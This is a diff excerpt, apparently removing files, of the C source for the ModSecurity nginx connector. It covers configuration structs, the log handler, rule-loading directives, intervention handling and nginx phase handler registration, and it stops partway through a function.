|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
/*
|
||||
* Should be filled with the headers that were sent to ModSecurity.
|
||||
*
|
||||
* The idea is to compare this set of headers with the headers that were
|
||||
* sent to the client. This check was placed because we don't have control
|
||||
* over other modules, thus, we may partially inspect the headers.
|
||||
*
|
||||
*/
|
||||
ngx_array_t *sanity_headers_out;
|
||||
#endif
|
||||
|
||||
unsigned waiting_more_body:1;
|
||||
unsigned body_requested:1;
|
||||
unsigned processed:1;
|
||||
unsigned logged:1;
|
||||
unsigned intervention_triggered:1;
|
||||
} ngx_http_modsecurity_ctx_t;
|
||||
|
||||
|
||||
typedef struct {
|
||||
void *pool;
|
||||
ModSecurity *modsec;
|
||||
ngx_uint_t rules_inline;
|
||||
ngx_uint_t rules_file;
|
||||
ngx_uint_t rules_remote;
|
||||
} ngx_http_modsecurity_main_conf_t;
|
||||
|
||||
|
||||
typedef struct {
|
||||
void *pool;
|
||||
/* RulesSet or Rules */
|
||||
void *rules_set;
|
||||
|
||||
ngx_flag_t enable;
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
ngx_flag_t sanity_checks_enabled;
|
||||
#endif
|
||||
|
||||
ngx_http_complex_value_t *transaction_id;
|
||||
} ngx_http_modsecurity_conf_t;
|
||||
|
||||
|
||||
typedef ngx_int_t (*ngx_http_modsecurity_resolv_header_pt)(ngx_http_request_t *r, ngx_str_t name, off_t offset);
|
||||
|
||||
typedef struct {
|
||||
ngx_str_t name;
|
||||
ngx_uint_t offset;
|
||||
ngx_http_modsecurity_resolv_header_pt resolver;
|
||||
} ngx_http_modsecurity_header_out_t;
|
||||
|
||||
|
||||
extern ngx_module_t ngx_http_modsecurity_module;
|
||||
|
||||
/* ngx_http_modsecurity_module.c */
|
||||
int ngx_http_modsecurity_process_intervention (Transaction *transaction, ngx_http_request_t *r, ngx_int_t early_log);
|
||||
ngx_http_modsecurity_ctx_t *ngx_http_modsecurity_create_ctx(ngx_http_request_t *r);
|
||||
char *ngx_str_to_char(ngx_str_t a, ngx_pool_t *p);
|
||||
#if (NGX_PCRE2)
|
||||
#define ngx_http_modsecurity_pcre_malloc_init(x) NULL
|
||||
#define ngx_http_modsecurity_pcre_malloc_done(x) (void)x
|
||||
#else
|
||||
ngx_pool_t *ngx_http_modsecurity_pcre_malloc_init(ngx_pool_t *pool);
|
||||
void ngx_http_modsecurity_pcre_malloc_done(ngx_pool_t *old_pool);
|
||||
#endif
|
||||
|
||||
/* ngx_http_modsecurity_body_filter.c */
|
||||
ngx_int_t ngx_http_modsecurity_body_filter_init(void);
|
||||
ngx_int_t ngx_http_modsecurity_body_filter(ngx_http_request_t *r, ngx_chain_t *in);
|
||||
|
||||
/* ngx_http_modsecurity_header_filter.c */
|
||||
ngx_int_t ngx_http_modsecurity_header_filter_init(void);
|
||||
ngx_int_t ngx_http_modsecurity_header_filter(ngx_http_request_t *r);
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
int ngx_http_modsecurity_store_ctx_header(ngx_http_request_t *r, ngx_str_t *name, ngx_str_t *value);
|
||||
#endif
|
||||
|
||||
/* ngx_http_modsecurity_log.c */
|
||||
void ngx_http_modsecurity_log(void *log, const void* data);
|
||||
ngx_int_t ngx_http_modsecurity_log_handler(ngx_http_request_t *r);
|
||||
|
||||
/* ngx_http_modsecurity_access.c */
|
||||
ngx_int_t ngx_http_modsecurity_access_handler(ngx_http_request_t *r);
|
||||
|
||||
/* ngx_http_modsecurity_rewrite.c */
|
||||
ngx_int_t ngx_http_modsecurity_rewrite_handler(ngx_http_request_t *r);
|
||||
|
||||
|
||||
#endif /* _NGX_HTTP_MODSECURITY_COMMON_H_INCLUDED_ */
|
|
@ -1,81 +0,0 @@
|
|||
/*
|
||||
* ModSecurity connector for nginx, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
*/
|
||||
|
||||
#ifndef MODSECURITY_DDEBUG
|
||||
#define MODSECURITY_DDEBUG 0
|
||||
#endif
|
||||
#include "ddebug.h"
|
||||
|
||||
#include "ngx_http_modsecurity_common.h"
|
||||
|
||||
|
||||
void
|
||||
ngx_http_modsecurity_log(void *log, const void* data)
|
||||
{
|
||||
const char *msg;
|
||||
if (log == NULL) {
|
||||
return;
|
||||
}
|
||||
msg = (const char *) data;
|
||||
|
||||
ngx_log_error(NGX_LOG_WARN, (ngx_log_t *)log, 0, "%s", msg);
|
||||
}
|
||||
|
||||
|
||||
ngx_int_t
|
||||
ngx_http_modsecurity_log_handler(ngx_http_request_t *r)
|
||||
{
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
ngx_http_modsecurity_conf_t *mcf;
|
||||
|
||||
dd("catching a new _log_ phase handler");
|
||||
|
||||
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
|
||||
if (mcf == NULL || mcf->enable != 1)
|
||||
{
|
||||
dd("ModSecurity not enabled... returning");
|
||||
return NGX_OK;
|
||||
}
|
||||
|
||||
/*
|
||||
if (r->method != NGX_HTTP_GET &&
|
||||
r->method != NGX_HTTP_POST && r->method != NGX_HTTP_HEAD) {
|
||||
dd("ModSecurity is not ready to deal with anything different from " \
|
||||
"POST, GET or HEAD");
|
||||
return NGX_OK;
|
||||
}
|
||||
*/
|
||||
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
|
||||
|
||||
dd("recovering ctx: %p", ctx);
|
||||
|
||||
if (ctx == NULL) {
|
||||
dd("something really bad happened here. returning NGX_ERROR");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
|
||||
if (ctx->logged) {
|
||||
dd("already logged earlier");
|
||||
return NGX_OK;
|
||||
}
|
||||
|
||||
dd("calling msc_process_logging for %p", ctx);
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(r->pool);
|
||||
msc_process_logging(ctx->modsec_transaction);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
return NGX_OK;
|
||||
}
|
|
@ -1,793 +0,0 @@
|
|||
/*
|
||||
* ModSecurity connector for nginx, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
*/
|
||||
|
||||
#ifndef MODSECURITY_DDEBUG
|
||||
#define MODSECURITY_DDEBUG 0
|
||||
#endif
|
||||
#include "ddebug.h"
|
||||
|
||||
#include "ngx_http_modsecurity_common.h"
|
||||
#include "stdio.h"
|
||||
#include <ngx_config.h>
|
||||
#include <ngx_core.h>
|
||||
#include <ngx_http.h>
|
||||
|
||||
static ngx_int_t ngx_http_modsecurity_init(ngx_conf_t *cf);
|
||||
static void *ngx_http_modsecurity_create_main_conf(ngx_conf_t *cf);
|
||||
static char *ngx_http_modsecurity_init_main_conf(ngx_conf_t *cf, void *conf);
|
||||
static void *ngx_http_modsecurity_create_conf(ngx_conf_t *cf);
|
||||
static char *ngx_http_modsecurity_merge_conf(ngx_conf_t *cf, void *parent, void *child);
|
||||
static void ngx_http_modsecurity_cleanup_instance(void *data);
|
||||
static void ngx_http_modsecurity_cleanup_rules(void *data);
|
||||
|
||||
|
||||
/*
|
||||
* PCRE malloc/free workaround, based on
|
||||
* https://github.com/openresty/lua-nginx-module/blob/master/src/ngx_http_lua_pcrefix.c
|
||||
*/
|
||||
|
||||
#if !(NGX_PCRE2)
|
||||
static void *(*old_pcre_malloc)(size_t);
|
||||
static void (*old_pcre_free)(void *ptr);
|
||||
static ngx_pool_t *ngx_http_modsec_pcre_pool = NULL;
|
||||
|
||||
static void *
|
||||
ngx_http_modsec_pcre_malloc(size_t size)
|
||||
{
|
||||
if (ngx_http_modsec_pcre_pool) {
|
||||
return ngx_palloc(ngx_http_modsec_pcre_pool, size);
|
||||
}
|
||||
|
||||
fprintf(stderr, "error: modsec pcre malloc failed due to empty pcre pool");
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static void
|
||||
ngx_http_modsec_pcre_free(void *ptr)
|
||||
{
|
||||
if (ngx_http_modsec_pcre_pool) {
|
||||
ngx_pfree(ngx_http_modsec_pcre_pool, ptr);
|
||||
return;
|
||||
}
|
||||
|
||||
#if 0
|
||||
/* this may happen when called from cleanup handlers */
|
||||
fprintf(stderr, "error: modsec pcre free failed due to empty pcre pool");
|
||||
#endif
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
ngx_pool_t *
|
||||
ngx_http_modsecurity_pcre_malloc_init(ngx_pool_t *pool)
|
||||
{
|
||||
ngx_pool_t *old_pool;
|
||||
|
||||
if (pcre_malloc != ngx_http_modsec_pcre_malloc) {
|
||||
ngx_http_modsec_pcre_pool = pool;
|
||||
|
||||
old_pcre_malloc = pcre_malloc;
|
||||
old_pcre_free = pcre_free;
|
||||
|
||||
pcre_malloc = ngx_http_modsec_pcre_malloc;
|
||||
pcre_free = ngx_http_modsec_pcre_free;
|
||||
|
||||
return NULL;
|
||||
}
|
||||
|
||||
old_pool = ngx_http_modsec_pcre_pool;
|
||||
ngx_http_modsec_pcre_pool = pool;
|
||||
|
||||
return old_pool;
|
||||
}
|
||||
|
||||
void
|
||||
ngx_http_modsecurity_pcre_malloc_done(ngx_pool_t *old_pool)
|
||||
{
|
||||
ngx_http_modsec_pcre_pool = old_pool;
|
||||
|
||||
if (old_pool == NULL) {
|
||||
pcre_malloc = old_pcre_malloc;
|
||||
pcre_free = old_pcre_free;
|
||||
}
|
||||
}
|
||||
#endif
|
||||
|
||||
/*
|
||||
* ngx_string's are not null-terminated in common case, so we need to convert
|
||||
* them into null-terminated ones before passing to ModSecurity
|
||||
*/
|
||||
ngx_inline char *ngx_str_to_char(ngx_str_t a, ngx_pool_t *p)
|
||||
{
|
||||
char *str = NULL;
|
||||
|
||||
if (a.len == 0) {
|
||||
return NULL;
|
||||
}
|
||||
|
||||
str = ngx_pnalloc(p, a.len+1);
|
||||
if (str == NULL) {
|
||||
dd("failed to allocate memory to convert space ngx_string to C string");
|
||||
/* We already returned NULL for an empty string, so return -1 here to indicate allocation error */
|
||||
return (char *)-1;
|
||||
}
|
||||
ngx_memcpy(str, a.data, a.len);
|
||||
str[a.len] = '\0';
|
||||
|
||||
return str;
|
||||
}
|
||||
|
||||
|
||||
ngx_inline int
|
||||
ngx_http_modsecurity_process_intervention (Transaction *transaction, ngx_http_request_t *r, ngx_int_t early_log)
|
||||
{
|
||||
char *log = NULL;
|
||||
ModSecurityIntervention intervention;
|
||||
intervention.status = 200;
|
||||
intervention.url = NULL;
|
||||
intervention.log = NULL;
|
||||
intervention.disruptive = 0;
|
||||
ngx_http_modsecurity_ctx_t *ctx = NULL;
|
||||
|
||||
dd("processing intervention");
|
||||
|
||||
ctx = ngx_http_get_module_ctx(r, ngx_http_modsecurity_module);
|
||||
if (ctx == NULL)
|
||||
{
|
||||
return NGX_HTTP_INTERNAL_SERVER_ERROR;
|
||||
}
|
||||
|
||||
if (msc_intervention(transaction, &intervention) == 0) {
|
||||
dd("nothing to do");
|
||||
return 0;
|
||||
}
|
||||
|
||||
log = intervention.log;
|
||||
if (intervention.log == NULL) {
|
||||
log = "(no log message was specified)";
|
||||
}
|
||||
|
||||
ngx_log_error(NGX_LOG_ERR, (ngx_log_t *)r->connection->log, 0, "%s", log);
|
||||
|
||||
if (intervention.log != NULL) {
|
||||
free(intervention.log);
|
||||
}
|
||||
|
||||
if (intervention.url != NULL)
|
||||
{
|
||||
dd("intervention -- redirecting to: %s with status code: %d", intervention.url, intervention.status);
|
||||
|
||||
if (r->header_sent)
|
||||
{
|
||||
dd("Headers are already sent. Cannot perform the redirection at this point.");
|
||||
return -1;
|
||||
}
|
||||
|
||||
/**
|
||||
* Not sure if it sane to do this indepent of the phase
|
||||
* but, here we go...
|
||||
*
|
||||
* This code cames from: http/ngx_http_special_response.c
|
||||
* function: ngx_http_send_error_page
|
||||
* src/http/ngx_http_core_module.c
|
||||
* From src/http/ngx_http_core_module.c (line 1910) i learnt
|
||||
* that location->hash should be set to 1.
|
||||
*
|
||||
*/
|
||||
ngx_http_clear_location(r);
|
||||
ngx_str_t a = ngx_string("");
|
||||
|
||||
a.data = (unsigned char *)intervention.url;
|
||||
a.len = strlen(intervention.url);
|
||||
|
||||
ngx_table_elt_t *location = NULL;
|
||||
location = ngx_list_push(&r->headers_out.headers);
|
||||
ngx_str_set(&location->key, "Location");
|
||||
location->value = a;
|
||||
r->headers_out.location = location;
|
||||
r->headers_out.location->hash = 1;
|
||||
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
ngx_http_modsecurity_store_ctx_header(r, &location->key, &location->value);
|
||||
#endif
|
||||
|
||||
return intervention.status;
|
||||
}
|
||||
|
||||
if (intervention.status != 200)
|
||||
{
|
||||
/**
|
||||
* FIXME: this will bring proper response code to audit log in case
|
||||
* when e.g. error_page redirect was triggered, but there still won't be another
|
||||
* required pieces like response headers etc.
|
||||
*
|
||||
*/
|
||||
msc_update_status_code(ctx->modsec_transaction, intervention.status);
|
||||
|
||||
if (early_log) {
|
||||
dd("intervention -- calling log handler manually with code: %d", intervention.status);
|
||||
ngx_http_modsecurity_log_handler(r);
|
||||
ctx->logged = 1;
|
||||
}
|
||||
|
||||
if (r->header_sent)
|
||||
{
|
||||
dd("Headers are already sent. Cannot perform the redirection at this point.");
|
||||
return -1;
|
||||
}
|
||||
dd("intervention -- returning code: %d", intervention.status);
|
||||
return intervention.status;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
void
|
||||
ngx_http_modsecurity_cleanup(void *data)
|
||||
{
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
|
||||
ctx = (ngx_http_modsecurity_ctx_t *) data;
|
||||
|
||||
msc_transaction_cleanup(ctx->modsec_transaction);
|
||||
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
/*
|
||||
* Purge stored context headers. Memory allocated for individual stored header
|
||||
* name/value pair will be freed automatically when r->pool is destroyed.
|
||||
*/
|
||||
ngx_array_destroy(ctx->sanity_headers_out);
|
||||
#endif
|
||||
}
|
||||
|
||||
|
||||
ngx_inline ngx_http_modsecurity_ctx_t *
|
||||
ngx_http_modsecurity_create_ctx(ngx_http_request_t *r)
|
||||
{
|
||||
ngx_str_t s;
|
||||
ngx_pool_cleanup_t *cln;
|
||||
ngx_http_modsecurity_ctx_t *ctx;
|
||||
ngx_http_modsecurity_conf_t *mcf;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
ctx = ngx_pcalloc(r->pool, sizeof(ngx_http_modsecurity_ctx_t));
|
||||
if (ctx == NULL)
|
||||
{
|
||||
dd("failed to allocate memory for the context.");
|
||||
return NULL;
|
||||
}
|
||||
|
||||
mmcf = ngx_http_get_module_main_conf(r, ngx_http_modsecurity_module);
|
||||
mcf = ngx_http_get_module_loc_conf(r, ngx_http_modsecurity_module);
|
||||
|
||||
dd("creating transaction with the following rules: '%p' -- ms: '%p'", mcf->rules_set, mmcf->modsec);
|
||||
|
||||
if (mcf->transaction_id) {
|
||||
if (ngx_http_complex_value(r, mcf->transaction_id, &s) != NGX_OK) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
ctx->modsec_transaction = msc_new_transaction_with_id(mmcf->modsec, mcf->rules_set, (char *) s.data, r->connection->log);
|
||||
|
||||
} else {
|
||||
ctx->modsec_transaction = msc_new_transaction(mmcf->modsec, mcf->rules_set, r->connection->log);
|
||||
}
|
||||
|
||||
dd("transaction created");
|
||||
|
||||
ngx_http_set_ctx(r, ctx, ngx_http_modsecurity_module);
|
||||
|
||||
cln = ngx_pool_cleanup_add(r->pool, sizeof(ngx_http_modsecurity_ctx_t));
|
||||
if (cln == NULL)
|
||||
{
|
||||
dd("failed to create the ModSecurity context cleanup");
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
cln->handler = ngx_http_modsecurity_cleanup;
|
||||
cln->data = ctx;
|
||||
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
ctx->sanity_headers_out = ngx_array_create(r->pool, 12, sizeof(ngx_http_modsecurity_header_t));
|
||||
if (ctx->sanity_headers_out == NULL) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
#endif
|
||||
|
||||
return ctx;
|
||||
}
|
||||
|
||||
|
||||
char *
|
||||
ngx_conf_set_rules(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
|
||||
{
|
||||
int res;
|
||||
char *rules;
|
||||
ngx_str_t *value;
|
||||
const char *error;
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_conf_t *mcf = conf;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
value = cf->args->elts;
|
||||
rules = ngx_str_to_char(value[1], cf->pool);
|
||||
|
||||
if (rules == (char *)-1) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
|
||||
res = msc_rules_add(mcf->rules_set, rules, &error);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
if (res < 0) {
|
||||
dd("Failed to load the rules: '%s' - reason: '%s'", rules, error);
|
||||
return strdup(error);
|
||||
}
|
||||
|
||||
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
|
||||
mmcf->rules_inline += res;
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
char *
|
||||
ngx_conf_set_rules_file(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
|
||||
{
|
||||
int res;
|
||||
char *rules_set;
|
||||
ngx_str_t *value;
|
||||
const char *error;
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_conf_t *mcf = conf;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
value = cf->args->elts;
|
||||
rules_set = ngx_str_to_char(value[1], cf->pool);
|
||||
|
||||
if (rules_set == (char *)-1) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
|
||||
res = msc_rules_add_file(mcf->rules_set, rules_set, &error);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
if (res < 0) {
|
||||
dd("Failed to load the rules from: '%s' - reason: '%s'", rules_set, error);
|
||||
return strdup(error);
|
||||
}
|
||||
|
||||
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
|
||||
mmcf->rules_file += res;
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
char *
|
||||
ngx_conf_set_rules_remote(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
|
||||
{
|
||||
int res;
|
||||
ngx_str_t *value;
|
||||
const char *error;
|
||||
const char *rules_remote_key, *rules_remote_server;
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_conf_t *mcf = conf;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
value = cf->args->elts;
|
||||
rules_remote_key = ngx_str_to_char(value[1], cf->pool);
|
||||
rules_remote_server = ngx_str_to_char(value[2], cf->pool);
|
||||
|
||||
if (rules_remote_server == (char *)-1) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
if (rules_remote_key == (char *)-1) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
|
||||
res = msc_rules_add_remote(mcf->rules_set, rules_remote_key, rules_remote_server, &error);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
|
||||
if (res < 0) {
|
||||
dd("Failed to load the rules from: '%s' - reason: '%s'", rules_remote_server, error);
|
||||
return strdup(error);
|
||||
}
|
||||
|
||||
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
|
||||
mmcf->rules_remote += res;
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
char *ngx_conf_set_transaction_id(ngx_conf_t *cf, ngx_command_t *cmd, void *conf) {
|
||||
ngx_str_t *value;
|
||||
ngx_http_complex_value_t cv;
|
||||
ngx_http_compile_complex_value_t ccv;
|
||||
ngx_http_modsecurity_conf_t *mcf = conf;
|
||||
|
||||
value = cf->args->elts;
|
||||
|
||||
ngx_memzero(&ccv, sizeof(ngx_http_compile_complex_value_t));
|
||||
|
||||
ccv.cf = cf;
|
||||
ccv.value = &value[1];
|
||||
ccv.complex_value = &cv;
|
||||
ccv.zero = 1;
|
||||
|
||||
if (ngx_http_compile_complex_value(&ccv) != NGX_OK) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
mcf->transaction_id = ngx_palloc(cf->pool, sizeof(ngx_http_complex_value_t));
|
||||
if (mcf->transaction_id == NULL) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
*mcf->transaction_id = cv;
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
static ngx_command_t ngx_http_modsecurity_commands[] = {
|
||||
{
|
||||
ngx_string("modsecurity"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_FLAG,
|
||||
ngx_conf_set_flag_slot,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
offsetof(ngx_http_modsecurity_conf_t, enable),
|
||||
NULL
|
||||
},
|
||||
{
|
||||
ngx_string("modsecurity_rules"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE1,
|
||||
ngx_conf_set_rules,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
offsetof(ngx_http_modsecurity_conf_t, enable),
|
||||
NULL
|
||||
},
|
||||
{
|
||||
ngx_string("modsecurity_rules_file"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE1,
|
||||
ngx_conf_set_rules_file,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
offsetof(ngx_http_modsecurity_conf_t, enable),
|
||||
NULL
|
||||
},
|
||||
{
|
||||
ngx_string("modsecurity_rules_remote"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE2,
|
||||
ngx_conf_set_rules_remote,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
offsetof(ngx_http_modsecurity_conf_t, enable),
|
||||
NULL
|
||||
},
|
||||
{
|
||||
ngx_string("modsecurity_transaction_id"),
|
||||
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_1MORE,
|
||||
ngx_conf_set_transaction_id,
|
||||
NGX_HTTP_LOC_CONF_OFFSET,
|
||||
0,
|
||||
NULL
|
||||
},
|
||||
ngx_null_command
|
||||
};
|
||||
|
||||
|
||||
static ngx_http_module_t ngx_http_modsecurity_ctx = {
|
||||
NULL, /* preconfiguration */
|
||||
ngx_http_modsecurity_init, /* postconfiguration */
|
||||
|
||||
ngx_http_modsecurity_create_main_conf, /* create main configuration */
|
||||
ngx_http_modsecurity_init_main_conf, /* init main configuration */
|
||||
|
||||
NULL, /* create server configuration */
|
||||
NULL, /* merge server configuration */
|
||||
|
||||
ngx_http_modsecurity_create_conf, /* create location configuration */
|
||||
ngx_http_modsecurity_merge_conf /* merge location configuration */
|
||||
};
|
||||
|
||||
|
||||
ngx_module_t ngx_http_modsecurity_module = {
|
||||
NGX_MODULE_V1,
|
||||
&ngx_http_modsecurity_ctx, /* module context */
|
||||
ngx_http_modsecurity_commands, /* module directives */
|
||||
NGX_HTTP_MODULE, /* module type */
|
||||
NULL, /* init master */
|
||||
NULL, /* init module */
|
||||
NULL, /* init process */
|
||||
NULL, /* init thread */
|
||||
NULL, /* exit thread */
|
||||
NULL, /* exit process */
|
||||
NULL, /* exit master */
|
||||
NGX_MODULE_V1_PADDING
|
||||
};
|
||||
|
||||
|
||||
static ngx_int_t
|
||||
ngx_http_modsecurity_init(ngx_conf_t *cf)
|
||||
{
|
||||
ngx_http_handler_pt *h_rewrite;
|
||||
ngx_http_handler_pt *h_access;
|
||||
ngx_http_handler_pt *h_log;
|
||||
ngx_http_core_main_conf_t *cmcf;
|
||||
int rc = 0;
|
||||
|
||||
cmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_core_module);
|
||||
if (cmcf == NULL)
|
||||
{
|
||||
dd("We are not sure how this returns, NGINX doesn't seem to think it will ever be null");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
/**
|
||||
*
|
||||
* Seems like we cannot do this very same thing with
|
||||
* NGX_HTTP_FIND_CONFIG_PHASE. it does not seems to
|
||||
* be an array. Our next option is the REWRITE.
|
||||
*
|
||||
* TODO: check if we can hook prior to NGX_HTTP_REWRITE_PHASE phase.
|
||||
*
|
||||
*/
|
||||
h_rewrite = ngx_array_push(&cmcf->phases[NGX_HTTP_REWRITE_PHASE].handlers);
|
||||
if (h_rewrite == NULL)
|
||||
{
|
||||
dd("Not able to create a new NGX_HTTP_REWRITE_PHASE handle");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
*h_rewrite = ngx_http_modsecurity_rewrite_handler;
|
||||
|
||||
/**
|
||||
*
|
||||
* Processing the request body on the access phase.
|
||||
*
|
||||
* TODO: check if hook into separated phases is the best thing to do.
|
||||
*
|
||||
*/
|
||||
h_access = ngx_array_push(&cmcf->phases[NGX_HTTP_ACCESS_PHASE].handlers);
|
||||
if (h_access == NULL)
|
||||
{
|
||||
dd("Not able to create a new NGX_HTTP_ACCESS_PHASE handle");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
*h_access = ngx_http_modsecurity_access_handler;
|
||||
|
||||
/**
|
||||
* Process the log phase.
|
||||
*
|
||||
* TODO: check if the log phase happens like it happens on Apache.
|
||||
* check if last phase will not hold the request.
|
||||
*
|
||||
*/
|
||||
h_log = ngx_array_push(&cmcf->phases[NGX_HTTP_LOG_PHASE].handlers);
|
||||
if (h_log == NULL)
|
||||
{
|
||||
dd("Not able to create a new NGX_HTTP_LOG_PHASE handle");
|
||||
return NGX_ERROR;
|
||||
}
|
||||
*h_log = ngx_http_modsecurity_log_handler;
|
||||
|
||||
|
||||
rc = ngx_http_modsecurity_header_filter_init();
|
||||
if (rc != NGX_OK) {
|
||||
return rc;
|
||||
}
|
||||
|
||||
rc = ngx_http_modsecurity_body_filter_init();
|
||||
if (rc != NGX_OK) {
|
||||
return rc;
|
||||
}
|
||||
|
||||
return NGX_OK;
|
||||
}
|
||||
|
||||
|
||||
static void *
|
||||
ngx_http_modsecurity_create_main_conf(ngx_conf_t *cf)
|
||||
{
|
||||
ngx_pool_cleanup_t *cln;
|
||||
ngx_http_modsecurity_main_conf_t *conf;
|
||||
|
||||
conf = (ngx_http_modsecurity_main_conf_t *) ngx_pcalloc(cf->pool,
|
||||
sizeof(ngx_http_modsecurity_main_conf_t));
|
||||
|
||||
if (conf == NULL)
|
||||
{
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
/*
|
||||
* set by ngx_pcalloc():
|
||||
*
|
||||
* conf->modsec = NULL;
|
||||
* conf->pool = NULL;
|
||||
* conf->rules_inline = 0;
|
||||
* conf->rules_file = 0;
|
||||
* conf->rules_remote = 0;
|
||||
*/
|
||||
|
||||
cln = ngx_pool_cleanup_add(cf->pool, 0);
|
||||
if (cln == NULL) {
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
cln->handler = ngx_http_modsecurity_cleanup_instance;
|
||||
cln->data = conf;
|
||||
|
||||
conf->pool = cf->pool;
|
||||
|
||||
/* Create our ModSecurity instance */
|
||||
conf->modsec = msc_init();
|
||||
if (conf->modsec == NULL)
|
||||
{
|
||||
dd("failed to create the ModSecurity instance");
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
/* Provide our connector information to LibModSecurity */
|
||||
msc_set_connector_info(conf->modsec, MODSECURITY_NGINX_WHOAMI);
|
||||
msc_set_log_cb(conf->modsec, ngx_http_modsecurity_log);
|
||||
|
||||
dd ("main conf created at: '%p', instance is: '%p'", conf, conf->modsec);
|
||||
|
||||
return conf;
|
||||
}
|
||||
|
||||
|
||||
static char *
|
||||
ngx_http_modsecurity_init_main_conf(ngx_conf_t *cf, void *conf)
|
||||
{
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
